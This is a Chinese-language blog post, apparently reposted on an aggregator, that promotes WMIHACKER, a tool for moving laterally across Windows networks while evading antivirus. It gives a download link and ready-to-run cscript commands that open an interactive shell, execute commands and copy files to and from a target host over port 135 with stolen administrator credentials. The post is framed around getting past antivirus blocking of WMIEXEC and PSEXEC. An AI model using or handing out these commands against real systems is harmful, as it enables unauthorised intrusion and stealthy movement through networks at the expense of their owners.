免殺橫向移動工具WMIHACKER

• • 交互式Shell
  • 命令執行
  • 文件上傳
  • 文件下載

免殺橫向滲透遠程命令執行，常見的WMIEXEC、PSEXEC執行命令是創建服務或調用Win32_Process.create執行命令，這些方式都已經被殺軟100%攔截，通過改造出WMIHACKER免殺橫向移動測試工具。

其通過135端口進行命令執行，執行的結果讀取以及無需445端口進行文件傳輸。此工具利用的前提條件是： 獲取到目標主機的賬戶密碼

可能會有人問既然我都拿到主機的賬號密碼，我遠程直接登錄不香嗎？那遠程桌面連接是不是需要開啟3389端口，如果目標主機沒有開啟3389端口呢？那我使用此款工具是不是可以通過135端口就能實現命令執行，而且還可以實現文件上傳/下載功能，同時還免殺。

免殺工具下載：https://wwe.lanzous.com/iCZOieai3sd
項目地址：https://github.com/360-Linton-Lab/WMIHACKER

以下 xx.xx.xx.xx 即目標主機內網IP地址

交互式Shell

# 獲取交互式Shell cscript WMIHACKER_0.6.vbs /shell xx.xx.xx.xx administrator "Password!"

命令執行

# 有命令回顯執行方式 cscript WMIHACKER_0.6.vbs /cmd xx.xx.xx.xx administrator "Password!" "ipconfig" 1# 無命令回顯執行方式 cscript WMIHACKER_0.6.vbs /cmd xx.xx.xx.xx administrator "Password!" "ipconfig > c:\1.txt" 0

文件上傳

# 復制本機calc.exe到遠程主機c:\calc.exe cscript wmihacker_0.4.vbe /upload xx.xx.xx.xx administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"

文件下載

# 下載遠程主機calc.exe到本地c:\calc.exe cscript wmihacker_0.4.vbe /download xx.xx.xx.xx administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"
我是為了好好偷懶才非常努力的XXR，See You Next Time.

總結

以上是生活随笔為你收集整理的免杀横向移动工具WMIHACKER的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。